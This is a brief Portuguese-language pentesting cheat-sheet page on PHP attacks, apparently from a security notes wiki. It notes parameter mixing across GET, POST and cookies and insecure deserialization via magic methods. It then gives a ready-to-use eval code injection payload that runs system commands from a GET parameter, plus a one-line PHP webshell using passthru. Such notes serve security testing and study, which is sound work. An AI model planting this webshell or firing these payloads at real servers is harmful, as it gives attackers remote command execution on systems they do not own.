PHP
Comportamentos Interessantes
As requisições do PHP recebem valores GET, POST, e também recebem COOKIES, isso pode levar a um comportamento interessante ao configurar os valores de GET e POST, ou até COOKIE com valores diferentes.
Desserialização Insegura PHP
Se em um código possui alguma magic method, podemos ter uma aplicação vulnerável a Desserialização Insegura.
Eval Code Injection
${system($_GET['nosferatu'])}&nosferatu=lsWebshell
<?php passthru($_GET['nosf']); ?>Last updated